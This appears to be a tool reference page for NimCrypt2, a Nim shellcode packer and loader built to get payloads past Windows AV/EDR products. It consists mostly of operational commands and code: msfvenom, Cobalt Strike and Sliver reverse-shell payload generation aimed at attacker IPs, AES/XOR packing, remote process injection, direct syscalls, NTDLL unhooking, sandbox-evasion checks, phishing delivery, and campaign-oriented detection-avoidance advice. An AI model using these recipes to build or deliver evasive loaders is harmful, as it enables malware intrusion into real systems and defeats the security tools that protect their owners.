Skip to content

NimCrypt2

NimCrypt2 is a .NET, PE and raw-shellcode packer/loader written in Nim. It encrypts the payload and wraps it in a Nim loader that combines several evasion techniques: AES encryption, direct syscalls, NTDLL unhooking and sandbox checks. Its purpose is to get payloads past AV/EDR products on Windows.

Installation

Prerequisites

Install Nim compiler and build tools:

# On Windows with Chocolatey
choco install nim mingw

# On macOS with Homebrew
brew install nim

# On Linux, use your package manager or download from nim-lang.org
apt-get install nim gcc mingw-w64

Clone and Setup

# Clone the NimCrypt2 repository
git clone https://github.com/icyguider/NimCrypt2.git
cd NimCrypt2

# Install Nim dependencies via nimble
nimble install -d

# Build the tool
nim c -d:release src/NimCrypt2.nim
# Output: NimCrypt2.exe in current directory

Building from Source

# Debug build (faster compilation, larger binary)
nim c -d:debug src/NimCrypt2.nim

# Release build (optimized, smaller binary, slower to compile)
nim c -d:release --opt:size src/NimCrypt2.nim

# Force a 64-bit build (the loader's architecture must match the shellcode's)
nim c -d:release --cpu:amd64 src/NimCrypt2.nim

Quick Start

Basic Shellcode Encryption

# Encrypt shellcode and create loader executable
NimCrypt2.exe -f shellcode.bin -o output.exe

# With all evasion techniques enabled
NimCrypt2.exe -f shellcode.bin -o output.exe -e AES -u -s -sleep 5000

Generating Shellcode Input

Create shellcode payloads from various frameworks:

# Metasploit Framework
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shellcode.bin

# Cobalt Strike: Attacks > Packages > Windows Executable (S) for a stageless
# Beacon (or Payload Generator for a staged one), set Output to "Raw",
# save as beacon.bin

# Sliver C2 (open-source Cobalt Strike alternative)
sliver > generate --mtls 192.168.1.100:8888 --format shellcode --save shellcode.bin

Input Options

Option        | Purpose                                | Example
-f <file>     | Path to raw shellcode file (required)  | -f payload.bin
-t <process>  | Target process name for injection      | -t svchost.exe
-r            | Enable remote thread injection         | -r
-m <addr>     | Manual base address override           | -m 0x140000000

Specifying Shellcode Input

# From Metasploit
NimCrypt2.exe -f meterpreter.bin -o loader.exe

# From CobaltStrike (stageless)
NimCrypt2.exe -f beacon.bin -o stager.exe -t explorer.exe

# From manual shellcode dump
NimCrypt2.exe -f custom_payload.bin -o custom.exe

Encryption Options

AES Encryption

# Default AES-CTR encryption
NimCrypt2.exe -f shellcode.bin -o output.exe -e AES

# Key material is generated at pack time (auto-generated if not specified)
# and embedded in the loader. An embedded key defeats static signatures only:
# anyone holding the binary also holds the key
NimCrypt2.exe -f shellcode.bin -o output.exe -e AES -k 32

XOR Encryption (Lighter Alternative)

# XOR encryption (faster, smaller file)
NimCrypt2.exe -f shellcode.bin -o output.exe -e XOR

# Multi-pass XOR
NimCrypt2.exe -f shellcode.bin -o output.exe -e XOR -k 4

Key Generation and Management

# Nim code for custom key generation (advanced)
import nimcrypto/sysrand

# Pull 32 bytes from the OS CSPRNG. newSeq[byte](32) on its own is an
# all-zero buffer, which would turn the "encryption" into a no-op.
var key = newSeq[byte](32)
if randomBytes(key) != key.len:
  quit("could not obtain random key material", 1)
# The key is written into the generated loader source and compiled in, so it
# protects against static signatures only, not against analysis of the binary
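The packing stage described in this section, as an added example in Python (not NimCrypt2's own code). It shows what the generator has to do regardless of cipher: take raw shellcode, encrypt it under a fresh random key, and emit both as Nim constants for the loader source. The XOR path is used here because its weakness is easy to demonstrate: the `recover_xor_key` function shows why the page's default is AES-CTR. The sample shellcode is a constructed blob whose first bytes match the fixed prologue of a standard msfvenom x64 stager, which is exactly the kind of known plaintext that breaks repeating-key XOR; the function and constant names are this example's own.

```python
import os
from itertools import cycle

# Constructed stand-in for a raw shellcode file. The first bytes are the prologue of a
# typical msfvenom x64 stager (cld; and rsp,-16; call ...), which is the same in every
# such payload and therefore acts as known plaintext for an analyst.
MSF_X64_PROLOGUE = bytes.fromhex("fc4883e4f0e8")
SAMPLE_SHELLCODE = bytes.fromhex("fc4883e4f0e8c0000000415141505251564831d265488b52") + bytes(range(24))


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def to_nim_array(name: str, data: bytes, per_line: int = 12) -> str:
    """Emit the blob as a Nim const so it can be compiled into the loader source."""
    if not data:
        return f"const {name}: array[0, byte] = []\n"
    rows = [", ".join(f"0x{b:02x}" for b in data[i:i + per_line])
            for i in range(0, len(data), per_line)]
    return f"const {name}: array[{len(data)}, byte] = [\n  byte " + ",\n  ".join(rows) + "\n]\n"


def pack(shellcode: bytes, key_len: int = 8):
    """Generate a random key, encrypt, and return (key, ciphertext, Nim source to embed)."""
    key = os.urandom(key_len)
    ct = xor_encrypt(shellcode, key)
    return key, ct, to_nim_array("encShellcode", ct) + to_nim_array("xorKey", key)


def recover_xor_key(ciphertext: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """Why XOR is only a signature dodge: key_len bytes of known plaintext give the whole key."""
    if len(known_prefix) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_prefix[:key_len]))


if __name__ == "__main__":
    key, ct, source = pack(SAMPLE_SHELLCODE, key_len=6)
    print(source)
    print("recovered key matches:", recover_xor_key(ct, MSF_X64_PROLOGUE, 6) == key)
```

With a 6-byte key and the 6-byte msfvenom prologue as known plaintext the key is recovered completely, and with it the whole payload. A longer XOR key only means an analyst needs a longer known prefix; AES-CTR with a random key has no such shortcut, which is why XOR should be treated as a size optimisation rather than protection.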

Execution Methods

Local Process Injection

# Inject into current process
NimCrypt2.exe -f shellcode.bin -o output.exe

# Allocate memory, write shellcode, execute
# Uses NtAllocateVirtualMemory → NtWriteVirtualMemory → NtCreateThreadEx

Remote Process Injection

# Inject into remote process (e.g., explorer.exe)
NimCrypt2.exe -f shellcode.bin -o output.exe -t explorer.exe

# Inject with specific target by PID (if supported)
NimCrypt2.exe -f shellcode.bin -o output.exe -t 1234

Remote Thread Creation

# Create remote thread in target process
NimCrypt2.exe -f shellcode.bin -o output.exe -t svchost.exe -r

# Execution flow:
# 1. Open a handle to the target process
# 2. Decrypt the shellcode in the loader's own memory
# 3. Allocate memory in the target (RWX in the simplest form; allocating RW and
#    flipping to RX with NtProtectVirtualMemory avoids a common RWX heuristic)
# 4. Write the decrypted shellcode into the target
# 5. Create a remote thread whose start address is the shellcode

Hollow Process (PE Hollowing)

# Replace legitimate process image (if supported in build)
NimCrypt2.exe -f shellcode.bin -o output.exe -t notepad.exe -hollow

Direct Syscalls

Native API Calls

NimCrypt2 issues native system calls directly instead of calling through the ntdll.dll stubs, which is where EDR products place their user-mode inline hooks:

# Core syscalls utilized by NimCrypt2:
# NtAllocateVirtualMemory - allocate executable memory
# NtWriteVirtualMemory - write shellcode to memory
# NtCreateThreadEx - create execution thread
# NtProtectVirtualMemory - change memory protection flags
# NtQueryVirtualMemory - query memory properties

Custom Syscall Integration

# Syscall stubs are compiled into the loader itself, so the hooked ntdll stubs
# are never executed for the calls listed above
# The SSN (System Service Number) differs between Windows builds, so it is
# resolved at runtime rather than hardcoded
# This defeats user-mode inline hooks only; kernel callbacks and ETW-TI still
# observe the resulting allocations and thread creation

Avoiding Import Address Table

# The Nt* functions reached via direct syscalls never appear in the import
# table, so IAT hooking and import-based signatures miss them
# The rest of the binary still imports what the Nim runtime needs (kernel32,
# msvcrt), so the loader is not import-free; a suspiciously empty IAT is
# itself a heuristic scanners use

Unhooking

Enable NTDLL Unhooking

# Replace hooked NTDLL with clean copy from disk
NimCrypt2.exe -f shellcode.bin -o output.exe -u

# Process:
# 1. Map a fresh copy of ntdll.dll from System32
# 2. Make the loaded ntdll's .text writable (NtProtectVirtualMemory), overwrite
#    it with the clean copy, restore the original protection
# 3. User-mode inline hooks are gone; kernel callbacks and ETW are unaffected
# 4. Later Nt* calls run through clean stubs
# Writing to ntdll's .text is itself a behaviour EDRs watch for

Manual Unhooking Verification

# Check whether an NTDLL stub is hooked (in generated code)
proc isHooked(fn: pointer): bool =
  ## Clean x64 Nt* stubs begin with `mov r10, rcx; mov eax, <SSN>` (4C 8B D1 B8).
  ## An inline hook overwrites that prologue with a JMP/CALL trampoline.
  let p = cast[ptr UncheckedArray[byte]](fn)
  result = not (p[0] == 0x4C and p[1] == 0x8B and p[2] == 0xD1 and p[3] == 0xB8)

Sandbox Evasion

Enable Sandbox Detection

# Activate all sandbox checks before execution
NimCrypt2.exe -f shellcode.bin -o output.exe -s

# Checks performed (the loader exits quietly if any one trips):
# - Domain join status (exit if the host is in a workgroup)
# - Processor core count (exit if < 2)
# - Physical memory (exit if < 4 GB)
# - Username (exit if WDAGUtilityAccount or Guest)
# - Registry artifacts (Hyper-V, VMware, VirtualBox)
# - Disk size (exit if < 30 GB)
# Note that the domain check also aborts on legitimate unjoined hosts
# (home machines, standalone servers)

Individual Evasion Checks

# Domain check only
NimCrypt2.exe -f shellcode.bin -o output.exe -sandbox-domain

# Memory check only
NimCrypt2.exe -f shellcode.bin -o output.exe -sandbox-memory

# Username check only
NimCrypt2.exe -f shellcode.bin -o output.exe -sandbox-user

Custom Sandbox Detection

# Example checks (standalone Nim, Windows only)
import std/cpuinfo

proc GetPhysicallyInstalledSystemMemory(totalKb: ptr uint64): int32
  {.importc, dynlib: "kernel32.dll", stdcall.}

if countProcessors() < 2:
  quit()  # fewer than 2 cores: likely a sandbox VM

var kb: uint64
if GetPhysicallyInstalledSystemMemory(addr kb) != 0 and kb < 4'u64 * 1024 * 1024:
  quit()  # less than 4 GiB of installed RAM

Sleep Obfuscation

Delayed Execution

# Sleep 5 seconds before executing shellcode
NimCrypt2.exe -f shellcode.bin -o output.exe -sleep 5000

# Measured in milliseconds
# 1000 = 1 second, 60000 = 1 minute
NimCrypt2.exe -f shellcode.bin -o output.exe -sleep 30000

Purpose of Sleep Obfuscation

Delays execution past the window in which automated sandboxes observe a sample. Note that -sleep is a start-up delay; the technique usually called sleep obfuscation (encrypting the implant's memory while it sleeps) is a different thing and not what this flag does.

# Sleep through the sandbox's analysis window
# A 30-60 s delay outlasts short analysis timeouts, but many sandboxes patch
# Sleep to return immediately or fast-forward the clock, so pair it with -s
NimCrypt2.exe -f shellcode.bin -o output.exe -sleep 60000 -u -s

Output Options

Executable Format

# Generate standalone EXE (default)
NimCrypt2.exe -f shellcode.bin -o payload.exe

# Generate DLL (if supported)
NimCrypt2.exe -f shellcode.bin -o payload.dll -format dll

# Generate reflective DLL
NimCrypt2.exe -f shellcode.bin -o payload.dll -format reflective

Output Customization

# Specify output directory
NimCrypt2.exe -f shellcode.bin -o C:\temp\loader.exe

# Output with custom entrypoint name
NimCrypt2.exe -f shellcode.bin -o output.exe -entry main

Integration Examples

Metasploit Integration

# Generate Meterpreter shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o meter.bin

# Encrypt and pack with NimCrypt2
NimCrypt2.exe -f meter.bin -o agent.exe -e AES -u -s -sleep 5000

# Execute on target
# agent.exe → connects to 10.10.10.10:4444

CobaltStrike Integration

# Export beacon from CobaltStrike as raw shellcode
# Attacks > Packages > Windows Executable (S), Output = Raw (the Artifact Kit
# builds EXE/DLL artifacts; it is not how you obtain raw shellcode)

# Process with NimCrypt2
NimCrypt2.exe -f beacon.bin -o evasive_beacon.exe -e AES -u -t svchost.exe -r

# Deliver via initial access method
# Phishing → payload.exe → reverse shell

Sliver C2 Integration

# Generate a Sliver implant directly as shellcode (the default --format is exe)
sliver > generate --mtls 192.168.1.100:8888 --format shellcode --save sliver.bin

# Package with NimCrypt2
NimCrypt2.exe -f sliver.bin -o sliver_loader.exe -e AES -u -s

Cobalt Strike BOF (Beacon Object File)

# A BOF is a COFF object that a running Beacon loads with inline-execute; it is
# not a standalone payload and is not what NimCrypt2 packs. Pack the Beacon
# itself (stageless raw output, above) and run BOFs from inside it afterwards.
NimCrypt2.exe -f beacon.bin -o beacon_loader.exe -r -t explorer.exe

Troubleshooting

Issue                      | Cause                              | Solution
"Invalid shellcode file"   | File doesn't exist or wrong path   | Verify the file path; use absolute paths
Compilation errors         | Nim not installed                  | Run choco install nim or use your package manager
EDR still detecting        | Evasion techniques inactive        | Use -e AES -u -s -sleep 5000 together
"Sandbox detected"         | Running in a VM                    | Test on bare metal or drop the -s flag
Output EXE won't execute   | Shellcode format incorrect         | Regenerate with msfvenom -f raw (e.g. -p windows/x64/shell_reverse_tcp) and confirm the architecture matches the loader
NTDLL unhooking fails      | System DLL corrupted               | Run on a patched system or skip the -u flag
Process injection timeout  | Target process terminating         | Use a longer-lived target such as svchost.exe

Common Build Issues

# "nim: command not found"
# Solution: Add Nim to PATH or reinstall

# "error: undeclared identifier"
# Solution: Run 'nimble install -d' to fetch missing dependencies

# "compilation hangs"
# Solution: release builds with --opt:size (and any obfuscation passes) take
#           noticeably longer than debug builds; confirm nim/gcc are still
#           consuming CPU before killing the build

Best Practices

Operational Security

  • Always test payloads in isolated lab environment first
  • Use different encryption keys for each campaign
  • Rotate shellcode generators between operations
  • Implement sleep obfuscation in all production payloads
  • Combine NTDLL unhooking with direct syscalls for maximum evasion
  • Never run generated payloads on your own machine

Payload Development

# Layer multiple evasion techniques
NimCrypt2.exe -f shellcode.bin -o final.exe \
  -e AES \
  -u \
  -s \
  -sleep 15000 \
  -t svchost.exe \
  -r

Detection Avoidance

  • Vary command-line arguments between campaigns
  • Randomize sleep duration (avoid predictable patterns)
  • Use process injection into legitimate Windows processes
  • Implement junk code and string obfuscation at Nim level
  • Do not upload operational payloads to VirusTotal or other multi-scanners: submitted samples are shared with vendors and burn the payload. Measure detection against AV/EDR products installed in your own lab instead

Output Verification

# Verify shellcode format before packing
file shellcode.bin  # Should be "data"

# Test on isolated VM with AV disabled first
# Then test with real EDR products installed

# Verify execution with Wireshark or netcat listener
nc -lvnp 4444  # Wait for reverse shell callback
Similar Tools

Tool               | Purpose                                          | Comparison
ScareCrow          | Shellcode loader with IAT/syscall obfuscation    | Go-based; similar evasion set, less actively maintained
Freeze             | Payload toolkit with process image obfuscation   | Go-based; more obfuscation, less flexible injection
PEzor              | PE packer with NTDLL unhooking                   | Bash-based; similar feature set
Donut              | In-memory .NET assembly loader                   | For .NET payloads; different use case
shhhloader         | Shellcode loader with advanced obfuscation       | Newer project by the same author; similar goals
Themida/WinLicense | Commercial PE packer                             | Professional-grade; cost-prohibitive
ConfuserEx         | .NET obfuscator                                  | For managed code only

When to Use Each Tool

  • NimCrypt2: Flexible shellcode encryption with direct syscall support
  • ScareCrow: Legacy campaigns, simpler requirements
  • Freeze: Maximum obfuscation for long-running implants
  • PEzor: Bash-compatible build pipelines
  • Donut: When payload is .NET executable or PowerShell